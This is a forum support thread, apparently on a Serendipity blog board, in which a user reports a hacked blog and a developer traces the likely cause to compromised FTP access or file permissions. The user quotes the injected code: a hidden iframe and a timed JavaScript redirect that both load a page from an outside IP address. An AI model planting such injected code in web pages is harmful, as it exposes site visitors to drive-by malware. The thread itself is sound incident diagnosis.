Hi,
when i have a look at my CoWriters Testblog i noticed, that it was hacked. I dont now the reason why.
If you want to have a look at my hacked blog:
http://www.bibi-rolli.de/blog101/
Can anybody help me, the database seams to be clear ...
Best wishes,
Rolli
Blog hacked
Could Be Anything...
You are running quite a lot of other applications...
Like a TRIAL version of Invision Power Board...
Of course you can drop a mail to phpaudit@suspekt.org and get an audit of your server for a fee
Like a TRIAL version of Invision Power Board...
Of course you can drop a mail to phpaudit@suspekt.org and get an audit of your server for a fee
In the morning i have had a further look and you are right, this is the code:
<IFRAME style="WIDTH: 1125px; HEIGHT: 1000px" marginWidth=0 marginHeight=0 src="http://217.13.198.251/avs/newdir1/stoorm.html" frameBorder=0 width=150 scrolling=no height=185> </IFRAME>
but i think it must be a problem of the blog, my second testblok with another (different ) user is hacked also in the same way. the rest of my server is pretty well ....
<IFRAME style="WIDTH: 1125px; HEIGHT: 1000px" marginWidth=0 marginHeight=0 src="http://217.13.198.251/avs/newdir1/stoorm.html" frameBorder=0 width=150 scrolling=no height=185> </IFRAME>
Code: Select all
<script LANGUAGE="JavaScript">
setTimeout("window.location='http://217.13.198.251/avs/newdir1/stoorm.html'",15000);
// delai d'attente en ms
</script>
<?php # $Id: index.php,v 1.77 2005/03/02 09:58:33 garvinhicking Exp $
-
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
The thing is this: The attacker cannot have inserted the code if he didn't have file access to index.php
Check the permissions of index.php - if the file is only writable by your FTP user and not nobody (aka webserver) then it means your FTP account got hacked.
There would be no way how serendipity could overwrite the index.php from only within the application.
Regards,
Garvin
Check the permissions of index.php - if the file is only writable by your FTP user and not nobody (aka webserver) then it means your FTP account got hacked.
There would be no way how serendipity could overwrite the index.php from only within the application.
Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/